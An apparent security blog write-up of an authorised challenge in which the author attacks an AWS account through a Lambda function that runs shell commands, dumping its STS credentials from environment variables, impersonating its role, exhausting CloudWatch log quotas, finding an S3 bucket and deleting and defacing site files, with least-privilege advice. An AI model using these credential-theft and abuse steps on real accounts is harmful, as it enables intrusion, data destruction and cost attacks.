Securing Serverless: Attacking an AWS Account via a Lambda Function

It’s not every day that someone lets you freely wreak havoc on their account just to find out what happens when you do.

Part two of a two-part series. Click to read Caleb Sima’s Securing Serverless: Defend or Attack?

On August 3rd 2018, I got a cryptic LinkedIn message from Caleb Sima, with only the following text:

Figure 1:



I have to admit that, at first, I didn't quite understand what Caleb was trying to tell me. However, a quick glimpse at the URL, which contained the words Lambda and Shell, suggested that he had deployed a Lambda function that lets users execute shell commands. I've seen several such projects in the past, such as Lambdash, which is why I wasn't overly impressed or engaged. A few seconds later, I decided to take a peek at the Web page, and noticed the call for a challenge:

Figure 2:

Seeing this, I first had to figure out Caleb's motives, so I fired him another message, trying to get more understanding as to why he decided to build this:

Figure 3:

So… Caleb decided to let people attack his AWS account through a Lambda function that enables you to run shell commands. Sounds like a worthy challenge. After all, it's not every day that someone lets you wreak havoc on their account and run attacks freely. Now I was excited!



Step 1: Gathering Reconnaissance



I started by extracting the filename of the function’s handler by running 'ls -lF' on the current directory (/var/task):

Figure 4:

With the filename at hand (index.js), I went on to retrieve the source code of the function by running 'cat index.js' (output truncated):

Figure 5:

At the time, the original source code was quite unimpressive, to say the least. It was the classic 'aws-lambda-function-that-executes-shell-commands' function; as mentioned earlier, I’ve seen plenty of such projects in the past.

"Ok then..." I thought to myself, "I can run shell commands, what's next? How do we go from here to inflicting some real damage on the account?"



My next attempt to gather more information was to list all the environment variables and see if Caleb had left something in there that might be useful, so I ran the ‘env’ command (output truncated):

Figure 6:

Step 2: Impersonating the Lambda Function

The next morning, I got to work, and decided to take another peek at the environment variables. Suddenly something dawned on me: when an AWS Lambda function executes, it uses the temporary security credentials received by assuming the IAM role the developer granted to that function. When assuming a role, the assuming entity receives 3 parameters from AWS STS (Security Token Service):

AWS_SECRET_ACCESS_KEY

AWS_ACCESS_KEY_ID

AWS_SESSION_TOKEN

These 3 extremely sensitive tokens were just printed on my browser screen as a result of listing the environment variables - "how convenient...," I thought to myself.
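To make the exposure concrete, here is a minimal Python sketch of how those three variables could be picked out of raw 'env' output. The helper name and the sample values are hypothetical placeholders, not the real output from the challenge site.

```python
# Hypothetical helper: pull the three STS credential variables out of raw `env` output.
CREDENTIAL_VARS = (
    "AWS_ACCESS_KEY_ID",
    "AWS_SECRET_ACCESS_KEY",
    "AWS_SESSION_TOKEN",
)


def extract_credentials(env_output: str) -> dict:
    """Return the credential variables found in NAME=value lines."""
    found = {}
    for line in env_output.splitlines():
        # Split on the first '=' only, since token values may contain '=' padding.
        name, sep, value = line.partition("=")
        if sep and name.strip() in CREDENTIAL_VARS:
            found[name.strip()] = value.strip()
    return found


if __name__ == "__main__":
    # Made-up sample values for illustration only.
    sample = "\n".join([
        "LANG=en_US.UTF-8",
        "AWS_ACCESS_KEY_ID=ASIAEXAMPLEKEYID",
        "AWS_SECRET_ACCESS_KEY=example-secret",
        "AWS_SESSION_TOKEN=example-token==",
    ])
    for name, value in extract_credentials(sample).items():
        print(f"export {name}={value}")
```

Anything that can read a function's environment, including an injected shell command, can recover these values the same way.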

For those of you who aren't familiar with the AWS IAM security model, this is an extremely granular and powerful security permissions model. Here's an excerpt from the AWS documentation on IAM roles:

An IAM role is similar to a user, in that it is an AWS identity with permission policies that determine what the identity can and cannot do in AWS. However, instead of being uniquely associated with one person, a role is intended to be assumable by anyone who needs it. Also, a role does not have standard long-term credentials (password or access keys) associated with it. Instead, if a user assumes a role, temporary security credentials are created dynamically and provided to the user. You can use roles to delegate access to users, applications, or services that don't normally have access to your AWS resources.

Now, given that I have the tokens generated to the function by AWS STS, I am no longer forced to work with the somewhat annoying and limiting www.lambdashell.com Web interface. I can simply use the tokens to invoke AWS CLI commands from my local machine. In order to do that, I set these environment variables locally by calling:

/> export AWS_SECRET_ACCESS_KEY=…..

/> export AWS_ACCESS_KEY_ID=….

/> export AWS_SESSION_TOKEN=....

To test the tokens, I decided to invoke the AWS STS command line utility with the option to get the current caller identity:

/> aws sts get-caller-identity

It took a second, and then the CLI tool sent me back the following:

{

"UserId": "AROA********GL4SXW:exec",

"Account": "1232*****446",

"Arn": "arn:aws:sts::1232*****446:assumed-role/lambda_basic_execution/exec"

}

Nice! I can now run the AWS CLI utilities locally, and essentially impersonate the IAM role that Caleb's Lambda function is running with. However, my newly discovered satisfaction didn't last long when I saw that the function is running with what seems to be the most basic and limiting IAM role - 'lambda_basic_execution.' Darn.
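The "Arn" field in that response already names the role. As a small sketch (the function name is my own, not part of any AWS tooling), the assumed-role ARN can be split into account, role name, and session name like this:

```python
def parse_assumed_role_arn(arn: str) -> dict:
    """Split an STS assumed-role ARN into account, role name, and session name.

    Expected shape: arn:aws:sts::<account>:assumed-role/<role>/<session>
    """
    parts = arn.split(":", 5)
    if len(parts) != 6 or parts[0] != "arn" or parts[2] != "sts":
        raise ValueError(f"not an STS ARN: {arn!r}")
    resource = parts[5].split("/")
    if len(resource) != 3 or resource[0] != "assumed-role":
        raise ValueError(f"not an assumed-role ARN: {arn!r}")
    return {
        "account": parts[4],
        "role_name": resource[1],
        "session_name": resource[2],
    }


if __name__ == "__main__":
    # The masked ARN from the get-caller-identity output above.
    arn = "arn:aws:sts::1232*****446:assumed-role/lambda_basic_execution/exec"
    print(parse_assumed_role_arn(arn))
```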



The reason for my sudden mood change was the fact that the role with which the function was running, was probably limited to the standard boilerplate AWS Lambda permissions. When you create a new function from scratch, you usually start with an IAM role that only enables the function to create new AWS CloudWatch log groups and streams, and to write log lines into those streams.

When looking at the AWS Lambda Web console, it would look like this:

Figure 7:
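For readers who cannot see the console view, the boilerplate permissions have roughly the shape of the AWS managed AWSLambdaBasicExecutionRole policy. The sketch below reproduces that shape in Python; it is an assumption about what such a role typically contains, not the actual policy attached to Caleb's role, which I had not seen at this point.

```python
import json

# Shape of the AWS managed AWSLambdaBasicExecutionRole policy.
# Assumption: the role in the challenge looked similar; the real policy was not visible.
BASIC_EXECUTION_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "logs:CreateLogGroup",
                "logs:CreateLogStream",
                "logs:PutLogEvents",
            ],
            "Resource": "*",
        }
    ],
}


def allowed_actions(policy: dict) -> list:
    """Collect every action named in the policy's Allow statements."""
    actions = []
    for statement in policy["Statement"]:
        if statement.get("Effect") != "Allow":
            continue
        listed = statement.get("Action", [])
        actions.extend([listed] if isinstance(listed, str) else listed)
    return actions


if __name__ == "__main__":
    print(json.dumps(BASIC_EXECUTION_POLICY, indent=2))
    print(allowed_actions(BASIC_EXECUTION_POLICY))
```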

My hopes were dashed. Caleb did not leave any application secrets stored insecurely as environment variables - a rather sad but common mistake that many developers make. (See the Serverless Security Top 10 guide.)

"What's next?" I asked myself. I decided to go back to my actual day job, which was piling up, and leave Caleb’s challenge for a while, until I either get a brilliant idea, or some more free time.


Step 3: Inflicting Minor Pain through CloudWatch

There wasn't much I could do with these permissions - at least nothing that would inflict any serious damage on Caleb's account. The only thing that came to mind was the fact that, by default, AWS allowed the creation of 5,000 log groups per account, per region. So I created a small Python script that runs the following CLI command 5,000 times, rotating the [NUM] part:

/> aws logs create-log-group --log-group-name PureSecGroup[NUM]

It took a few minutes to run, but at the end, what I was waiting for finally showed up on screen:

/> An error occurred (LimitExceededException) when calling the CreateLogGroup operation: Resource limit exceeded.

I didn't know how much pain this actually inflicted. However, I can imagine a scenario where new functions are deployed in the same account/region and end up unable to generate logs. Not much, but at least I finally managed to do something.
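The original script is not reproduced in this post, so the following is only a reconstruction of the idea under stated assumptions: it builds the same CLI command with a rotating number and, unless told to execute, merely prints what it would run. The function names and the dry-run default are mine.

```python
import subprocess


def build_commands(prefix: str, count: int) -> list:
    """Build one create-log-group command per number, rotating the [NUM] part."""
    return [
        ["aws", "logs", "create-log-group", "--log-group-name", f"{prefix}{num}"]
        for num in range(count)
    ]


def run(commands: list, execute: bool = False) -> None:
    """Print each command, or run it via the AWS CLI when execute=True."""
    for command in commands:
        if not execute:
            print(" ".join(command))
            continue
        result = subprocess.run(command, capture_output=True, text=True)
        if result.returncode != 0:
            print(result.stderr.strip())
            # Stop once the per-region log group quota has been reached.
            if "LimitExceededException" in result.stderr:
                break


if __name__ == "__main__":
    # Dry run with a handful of names; the article used 5,000 iterations.
    run(build_commands("PureSecGroup", 3))
```

Running with execute=True requires the AWS CLI and credentials in the environment, and should only ever be pointed at an account you are authorized to test.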

Using the same technique, I could've filled Caleb's CloudWatch logs with gigabytes of data, eventually leading to a "Denial of Wallet" scenario. However, that didn't seem like a worthwhile target, so I decided to try a different direction.

Step 4: Over-Privileged IAM Permissions

The overall feeling I had at this point was that I reached a dead end. Not because I didn't know how to do something more serious, but rather because I knew that the limited permissions the function has through the 'lambda_basic_execution' role, won’t allow me to mount more sophisticated attacks.

This is where I want to pause and take a moment to emphasize the security benefits of using a well-designed microservice architecture, in conjunction with a granular security permissions model such as the one offered by AWS Lambda. Think about it for a moment: I was facing an application that is vulnerable to RCE (remote code execution). In traditional applications (e.g. Web applications), an RCE is the holy grail for hackers. Usually, this means an attacker can run arbitrary code, access sensitive data, and in general abuse the system as he or she sees fit.

Having said that, there I was, facing a system that is vulnerable to RCE, yet I was sitting frustrated in front of my screen and keyboard, with nothing much to do. The fact that other, potentially juicier parts of Caleb's serverless application were not known or accessible to me, together with the fact that this vulnerable Lambda function only had limited permissions over CloudWatch logs, put me in a position where I was confined. It's crazy.



Some Advice for Serverless Developers

So, here's my advice to serverless developers - when you design a serverless application, harness the microservices model not only for breaking down things to more manageable logical components, but also because you are essentially compartmentalizing different capabilities from one another. Such a design, coupled with a well configured and strict IAM permissions model, will go a long way in reducing the blast radius when one of the components (functions) is vulnerable and abused. In essence, this is very similar to how bulkheads are used in a ship - you are creating watertight compartments that can contain water in the case of a hull breach.
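As one illustration of what "strict" can mean, the sketch below builds a logging policy scoped to a single function's log group. It assumes the log group is created ahead of time, so the function itself never needs logs:CreateLogGroup. The region, account ID, and function name are hypothetical placeholders.

```python
import json


def scoped_logging_policy(region: str, account_id: str, function_name: str) -> dict:
    """Allow writing only to this function's own, pre-created log group."""
    log_group_arn = (
        f"arn:aws:logs:{region}:{account_id}:log-group:/aws/lambda/{function_name}"
    )
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                # No logs:CreateLogGroup: assumes the group exists before deployment.
                "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
                "Resource": f"{log_group_arn}:*",
            }
        ],
    }


if __name__ == "__main__":
    # Placeholder identifiers, not values from the challenge.
    policy = scoped_logging_policy("us-east-1", "123456789012", "my-function")
    print(json.dumps(policy, indent=2))
```

With a policy like this, a compromised function could still write to its own log streams but could not create arbitrary log groups elsewhere in the account.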

Frustrated as I was, I decided that my only chance of doing any damage to Caleb's account would be if he made a mistake, and granted the IAM role with which the function runs more privileges than what it actually needs. But how would I know that? I could try to invoke the AWS IAM service from the CLI, and see if I can list the role's security policy.

With some hope, I went to look up the AWS CLI command I needed, and found that ‘get-role’ was what I had to run next. The AWS IAM documentation specifies the following:

NAME

get-role -

DESCRIPTION

Retrieves information about the specified role, including the role's path, GUID, ARN, and the role's trust policy that grants permission to assume the role.

And so I tried the following:

/> aws iam get-role --role-name lambda_basic_execution

To which the AWS CLI replied with the following:

/> An error occurred (AccessDenied) when calling the GetRole operation: User: arn:aws:sts::1232*****446:assumed-role/lambda_basic_execution/exec is not authorized to perform: iam:GetRole on resource: role lambda_basic_execution

Damn, so close…

I decided not to give up and to see if I could find any other AWS service or resource on which this role/function might have over-privileged permissions. However, there are dozens of resources and services in AWS, and each of them has dozens of different actions you can run. How would I know what works and what doesn't? I posed this question to my PureSec colleague, Yuri Shapira, who immediately offered to code a small script that would use the same temporary security tokens as I did, run a brute-force process rotating through all of the relevant AWS SDK methods on all of the services, and send us back a report. Brilliant, I thought to myself, all we have to do is wait for the output.
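Yuri's script is not shown in this post, so what follows is only a rough sketch of the general idea, not his implementation. It runs a list of read-only AWS CLI commands and sorts each into allowed, denied, or error based on the exit status and error text. The candidate list, the function names, and the replayed responses in the demo are all assumptions for illustration.

```python
import subprocess


def classify(returncode: int, stderr: str) -> str:
    """Sort one CLI result into 'allowed', 'denied', or 'error'."""
    if returncode == 0:
        return "allowed"
    if "AccessDenied" in stderr or "UnauthorizedOperation" in stderr:
        return "denied"
    return "error"


def cli_runner(command: list) -> tuple:
    """Run a command with the AWS CLI, using credentials from the environment."""
    result = subprocess.run(command, capture_output=True, text=True)
    return result.returncode, result.stderr


def probe(commands: list, runner=cli_runner) -> dict:
    """Try every command and report which ones the credentials may call."""
    report = {}
    for command in commands:
        returncode, stderr = runner(command)
        report[" ".join(command)] = classify(returncode, stderr)
    return report


if __name__ == "__main__":
    candidates = [
        ["aws", "sts", "get-caller-identity"],
        ["aws", "iam", "get-role", "--role-name", "lambda_basic_execution"],
    ]

    def replay(command: list) -> tuple:
        # Stand-in runner replaying the two outcomes seen so far in this article.
        if command[1] == "iam":
            return 254, "An error occurred (AccessDenied) when calling the GetRole operation"
        return 0, ""

    for name, verdict in probe(candidates, runner=replay).items():
        print(f"{verdict:8} {name}")
```

A real run would drop the replay stand-in and pass a much longer candidate list, limited to read-only calls so the probe itself does no damage.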

Waiting…

I couldn't sit and do nothing while Yuri was coding his script, and so I decided to try one more thing. Since www.lambdashell.com was a Web application, I was wondering if Caleb was hosting the files in the AWS S3 storage service. If so, perhaps I could find some improper permissions on the bucket. However, in order to use the AWS s3api command line utility for accessing S3 data, I needed to know the name of the bucket which is hosting the site’s files. Easy, I can use the following:

/> aws s3api list-buckets

If this worked, the AWS S3 service would send me the list of all buckets owned by the account. Instead, the AWS service replied with the now-usual response:

/> An error occurred (AccessDenied) when calling the ListBuckets operation: Access Denied

Dead end, again…


Step 5: What Would Happen if I Do This...

So I can't list the buckets… how would I know which bucket exists, if such a bucket exists at all? I decided to try the first thing that came to mind - use the site's URL as the S3 bucket's name (again, common practice among developers). I was thinking to myself that this is extremely naive, and I would be very lucky if this actually worked. I decided to try this by invoking the 'head-bucket' option, which according to the AWS s3api documentation is "useful to determine if a bucket exists and you have permission to access it." Sounds exactly like the kind of thing I could use.

/> aws s3api head-bucket --bucket www.lambdashell.com

A second later, I got an empty response from the AWS CLI:

/>

Odd, I thought to myself. Does an empty response mean the bucket exists, or does it mean I’m back to square one? I decided to give it another shot, this time using a made-up random bucket name, which I assumed wouldn't exist:

/> aws s3api head-bucket --bucket whatever.foobar.puresec

The reply didn't take long:

/> An error occurred (404) when calling the HeadBucket operation: Not Found

Bazinga! We're back in business baby!

So now I knew that Caleb's account had an S3 bucket called 'www.lambdashell.com'. My next step was to see if I could list the contents of this bucket. Who knows? Maybe I would find some sensitive data stored in there.
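The reasoning behind that conclusion can be written down as a small sketch. HeadBucket answers with an HTTP status: a 200 (the empty CLI response) means the bucket exists and the credentials may access it, a 404 means no such bucket, and a 403 generally means the bucket exists but access is denied. The helper names below are my own, and the name guesses simply follow the "site URL as bucket name" habit mentioned above.

```python
def candidate_bucket_names(hostname: str) -> list:
    """Guess bucket names from a site hostname, with and without 'www.'."""
    host = hostname.lower().strip(".")
    bare = host[4:] if host.startswith("www.") else host
    # dict.fromkeys removes duplicates while keeping the original order.
    return list(dict.fromkeys([host, bare, "www." + bare]))


def interpret_head_bucket(status_code: int) -> str:
    """Translate a HeadBucket HTTP status into what it reveals."""
    meanings = {
        200: "bucket exists and these credentials may access it",
        403: "bucket exists but access is denied",
        404: "no bucket with this name",
    }
    # Other statuses (for example redirects) are treated as inconclusive here.
    return meanings.get(status_code, "inconclusive")


if __name__ == "__main__":
    print(candidate_bucket_names("www.lambdashell.com"))
    for status in (200, 403, 404):
        print(status, "->", interpret_head_bucket(status))
```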



I then used the 'list-objects' option in the following manner:

/> aws s3api list-objects --bucket www.lambdashell.com

At that point, the server replied with a list of objects/files (truncated):

Figure 9:

Nice, not much in there, just some CSS files, the main site's index HTML page, and some JavaScript files.

I was thinking to myself, "what would happen if I tried to delete one of the files?" Given my previous experience with the strict IAM permissions, I wasn't really expecting this to work, but why not give it a try? I will use the 'delete-object' option:

/> aws s3api delete-object --bucket www.lambdashell.com --key "index.html"

The response to this command surprised me … it was empty. Empty?! Does this mean the file was deleted, or not?!



So, I invoked the AWS s3api tool with the 'list-objects' option once again, and my jaw dropped… index.html wasn't there anymore! Double Bazinga!

Step 6: PureSec on the Leaderboard

However, now the site www.lambdashell.com was down, and who knows, maybe Caleb had some automation script that would recreate the whole thing in a few minutes. Nobody would believe me, so I decided to try one more thing - to create an HTML file called "puresec.html" containing the text "PureSec hacked this site!"

/> aws s3api put-object --bucket www.lambdashell.com --key "puresec.html" --body body.html

To which the AWS S3 service replied with:

{

"ETag": "\"654aa29207e06e89065a718a1a79b38b\""

}

Yea Baby! File created, I have proof.

Just to verify, I ran the 'list-objects' command on the bucket again:

Figure 10:

There it was, dim-white on terminal-black - my file was there.



PureSec: 1, LambdaShell: 0. Since I was the only one who managed to cause some serious damage to Caleb's serverless application, I was now granted 1st place on the leaderboard - which stayed this way until the time of writing this post.

Figure 11:

As Caleb was away at the Black Hat conference in Las Vegas that day and didn’t have access to his laptop, the site stayed down for a couple of days, which gave me lots of pleasure. Later, the site was resurrected, IAM permissions were fixed, and access to the S3 bucket is no longer an option.
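A simple audit could catch this kind of excess before an attacker does. The sketch below compares the actions a policy allows against the short list a function actually needs. The example policy is hypothetical: the real policy behind the challenge was never visible to me, so the 's3:*' statement is only a guess at the kind of grant that would explain what happened.

```python
def excess_actions(policy: dict, needed: set) -> set:
    """Return allowed actions that are not in the set the function needs."""
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    excess = set()
    for statement in statements:
        if statement.get("Effect") != "Allow":
            continue
        actions = statement.get("Action", [])
        if isinstance(actions, str):
            actions = [actions]
        # Anything outside the needed set, wildcards included, gets flagged.
        excess.update(action for action in actions if action not in needed)
    return excess


if __name__ == "__main__":
    # Hypothetical over-privileged policy, for illustration only.
    policy = {
        "Version": "2012-10-17",
        "Statement": [
            {"Effect": "Allow", "Action": ["logs:CreateLogStream", "logs:PutLogEvents"], "Resource": "*"},
            {"Effect": "Allow", "Action": "s3:*", "Resource": "*"},
        ],
    }
    needed = {"logs:CreateLogStream", "logs:PutLogEvents"}
    print(sorted(excess_actions(policy, needed)))
```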

Since that week at the beginning of August, we haven't put any further effort into hacking this application - not because we're not intrigued by the challenge, but rather because we're busy doing other things. We are aware that Caleb modified the application quite a bit, and that another AWS Lambda function was added in order to make things more interesting. However, it's time to let someone else take a stab at attacking it… we've done enough damage already.
